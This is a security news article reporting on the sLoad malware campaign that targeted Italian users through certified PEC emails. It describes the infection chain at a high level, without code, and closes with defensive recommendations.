Light Dark
October 7, 2019 By David Bisson 2 min read

Attackers are leveraging certified emails to target Italian users with samples of the sLoad malware family.

According to Cybaze-Yoroi ZLAB, the sLoad campaign began when criminals used certified emails to target Italian organizations and consultants affiliated with professional associations. Known as posta elettronica certificata (PEC) in Italy, certified emails are essentially normal email messages that come with an added guarantee of the sender’s identity. This verification lulled recipients into a false sense of security and tricked them into opening the attached .ZIP file.

Once opened, unlike previous attack campaigns, the .ZIP archive didn’t hide PowerShell code. Instead, it contained a corrupted PDF document and a VBS script. The first item attempted to trick the recipient that all was well so that they would run the script. If they complied, the script launched a PowerShell script retrieved from the attackers’ infrastructure that downloaded a malicious .JPG using bitsadmin.exe. This technique helped the campaign evade detection from AV tools while the image file loaded another PowerShell script that established persistence on the infected machine and used a series of other commands to download the final payload.

A Wave of Attacks Exploiting Posta Elettronica Certificata (PEC)

The sLoad operation isn’t the first attack campaign to involve certified email in some way. In January 2017, My Online Security detected a malspam campaign that used “posta certifica” in the subject line and body of its attack emails. Approximately two years later, researchers at ESET observed DanaBot combing through victims’ inboxes for emails specifically containing the substring “pec,” presumably in an effort to target corporate and public administration emails. Then, in April 2019, Cisco Talos discovered attackers pairing PEC with the JasperLoader downloader to target Italians with the Gootkit banking Trojan.

Help Defend Against sLoad Malware

Security professionals can help their organizations defend against sLoad by moving systems away from a model of escalated privilege access and toward one of least privilege through access management, multifactor authentication (MFA) and other security controls. Employee security awareness training, along with sophisticated security information and event management (SIEM) tools, can help organizations detect and defend against PowerShell attacks.

 |  |  |  |  |  |  |  |  | 
David Bisson
Contributing Editor

More from

November 15, 2024

Cybersecurity dominates concerns among the C-suite, small businesses and the nation

4 min read - Once relegated to the fringes of business operations, cybersecurity has evolved into a front-and-center concern for organizations worldwide. What was once considered a technical issue managed by IT departments has become a boardroom topic of utmost importance. With the rise of sophisticated cyberattacks, the growing use of generative AI by threat actors and massive data breach costs, it is no longer a question of whether cybersecurity matters but how deeply it affects every facet of modern operations.The 2024 Allianz Risk…

November 14, 2024

Autonomous security for cloud in AWS: Harnessing the power of AI for a secure future

3 min read - As the digital world evolves, businesses increasingly rely on cloud solutions to store data, run operations and manage applications. However, with this growth comes the challenge of ensuring that cloud environments remain secure and compliant with ever-changing regulations. This is where the idea of autonomous security for cloud (ASC) comes into play.Security and compliance aren't just technical buzzwords; they are crucial for businesses of all sizes. With data breaches and cyber threats on the rise, having systems that ensure your…

November 13, 2024

Adversarial advantage: Using nation-state threat analysis to strengthen U.S. cybersecurity

4 min read - Nation-state adversaries are changing their approach, pivoting from data destruction to prioritizing stealth and espionage. According to the Microsoft 2023 Digital Defense Report, "nation-state attackers are increasing their investments and launching more sophisticated cyberattacks to evade detection and achieve strategic priorities."These actors pose a critical threat to United States infrastructure and protected data, and compromising either resource could put citizens at risk.Thankfully, there's an upside to these malicious efforts: information. By analyzing nation-state tactics, government agencies and private enterprises are…

Topic updates

 Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today
© 2024 IBM Contact Privacy Terms of use Accessibility Cookie Preferences
Sponsored by si-icon-eightbarfeature